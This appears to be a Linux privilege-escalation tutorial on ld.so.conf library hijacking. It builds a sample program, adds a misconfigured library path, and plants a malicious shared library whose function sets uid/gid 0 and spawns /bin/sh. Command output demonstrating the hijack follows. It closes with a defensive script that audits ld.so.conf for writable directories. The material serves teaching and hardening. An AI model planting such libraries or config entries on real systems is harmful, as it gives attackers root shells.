ld.so.conf example
Prepare the environment
In the following section you can find the code of the files we are going to use to prepare the environment:

{% tabs %}
{% tab title="sharedvuln.c" %}
```c
#include <stdio.h>
#include "libcustom.h"

int main(){
    printf("Welcome to my amazing application!\n");
    say_hi(); // Resolved at run time from libcustom.so
    return 0;
}
```
{% endtab %}

{% tab title="libcustom.h" %}
```c
#include <stdio.h>

// Exported by libcustom.so
void say_hi();
```
{% endtab %}

{% tab title="libcustom.c" %}
```c
#include <stdio.h>

void say_hi()
{
    puts("Hi");
}
```
{% endtab %}
{% endtabs %}
- Create those files on your machine in the same folder
- Compile the library: `gcc -shared -o libcustom.so -fPIC libcustom.c`
- Copy `libcustom.so` to `/usr/lib`: `sudo cp libcustom.so /usr/lib` (root privs)
- Compile the executable: `gcc sharedvuln.c -o sharedvuln -lcustom`
Check the environment
Check that `libcustom.so` is being loaded from `/usr/lib` and that you can execute the binary.

```bash
$ ldd sharedvuln
	linux-vdso.so.1 => (0x00007ffc9a1f7000)
	libcustom.so => /usr/lib/libcustom.so (0x00007fb27ff4d000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fb27fb83000)
	/lib64/ld-linux-x86-64.so.2 (0x00007fb28014f000)

$ ./sharedvuln
Welcome to my amazing application!
Hi
```
Exploit
In this scenario we are going to suppose that someone has created a vulnerable entry inside a file in `/etc/ld.so.conf.d/`:

```bash
# The redirection must run as root, so pipe into "sudo tee" instead of using "sudo echo ... >"
echo "/home/ubuntu/lib" | sudo tee /etc/ld.so.conf.d/privesc.conf
```

The vulnerable folder is `/home/ubuntu/lib`, where we have write access.

Download and compile the following code inside that path:
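```c
//gcc -shared -o libcustom.so -fPIC libcustom.c

#include <stdio.h>
#include <stdlib.h>   // system()
#include <unistd.h>
#include <sys/types.h>

// Same symbol name as the legitimate library, so the binary calls this instead
void say_hi(){
    setuid(0);
    setgid(0);
    printf("I'm the bad library\n");
    system("/bin/sh"); // system() takes a single argument
}
```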
Now that we have created the malicious libcustom library inside the misconfigured path, we need to wait for a reboot or for the root user to execute `ldconfig` (_in case you can execute this binary as **sudo** or it has the **suid bit** you will be able to execute it yourself_).

Once this has happened, recheck where the `sharedvuln` executable is loading the `libcustom.so` library from:
```bash
$ ldd sharedvuln
	linux-vdso.so.1 => (0x00007ffeee766000)
	libcustom.so => /home/ubuntu/lib/libcustom.so (0x00007f3f27c1a000)
	libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f3f27850000)
	/lib64/ld-linux-x86-64.so.2 (0x00007f3f27e1c000)
```
As you can see, it's loading it from `/home/ubuntu/lib`, and if any user executes it, a shell will be executed:

```bash
$ ./sharedvuln
Welcome to my amazing application!
I'm the bad library
$ whoami
ubuntu
```
{% hint style="info" %} Note that in this example we haven't escalated privileges, but by modifying the commands executed and waiting for root or another privileged user to execute the vulnerable binary, we will be able to escalate privileges. {% endhint %}
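
To check a host for the misconfiguration this page relies on, the following script (an added example, not part of the original page) walks `/etc/ld.so.conf` and its `include` files and reports every search directory that is not root-owned or is group/world-writable. The names `check_dir`, `audit_ld_conf` and `TRUSTED_UID` are hypothetical, and it assumes a `stat` that supports `-c` and one directory per config line.

```shell
#!/bin/sh
# Added example, not from the original page: report ldconfig search
# directories that an account other than TRUSTED_UID could write to.
# Assumes GNU/busybox stat (-c) and one directory per config line.
TRUSTED_UID=${TRUSTED_UID:-0}   # assumption: only this owner is trusted

# Flag $1 (or, if it does not exist, its nearest existing ancestor, since
# whoever can write there can create it). $2 is the file that listed it.
check_dir() {
    dir=$1
    while [ ! -d "$dir" ] && [ "$dir" != "/" ]; do
        dir=$(dirname "$dir")
    done
    owner=$(stat -L -c %u "$dir") || return 0
    mode=$(stat -L -c %a "$dir")
    reason=""
    [ "$owner" = "$TRUSTED_UID" ] || reason="owner uid $owner"
    [ $(( 0$mode & 022 )) -eq 0 ] || reason="${reason:+$reason, }mode $mode"
    [ -z "$reason" ] || printf 'UNSAFE %s (checked %s: %s) from %s\n' \
        "$1" "$dir" "$reason" "$2"
}

# Walk one config file. "include" patterns are globbed; relative patterns
# resolve against the including file's directory. $2 caps include depth.
audit_ld_conf() {
    conf=${1:-/etc/ld.so.conf}
    depth=${2:-0}
    [ -r "$conf" ] && [ "$depth" -lt 8 ] || return 0
    base=$(dirname "$conf")
    while IFS= read -r line || [ -n "$line" ]; do
        line=${line%%#*}                    # drop comments
        set -f; set -- $line; set +f        # split words without globbing
        [ $# -gt 0 ] || continue
        if [ "$1" = "include" ]; then
            shift
            for pat in "$@"; do
                case $pat in /*) ;; *) pat=$base/$pat ;; esac
                for inc in $pat; do         # unquoted on purpose: expand glob
                    if [ -f "$inc" ]; then
                        ( audit_ld_conf "$inc" "$((depth + 1))" )
                    fi
                done
            done
        else
            check_dir "$1" "$conf"
        fi
    done < "$conf"
}

audit_ld_conf "${1:-/etc/ld.so.conf}"
```

With the `privesc.conf` entry from this page in place, the script prints an `UNSAFE /home/ubuntu/lib` line because the directory is owned by a non-root user.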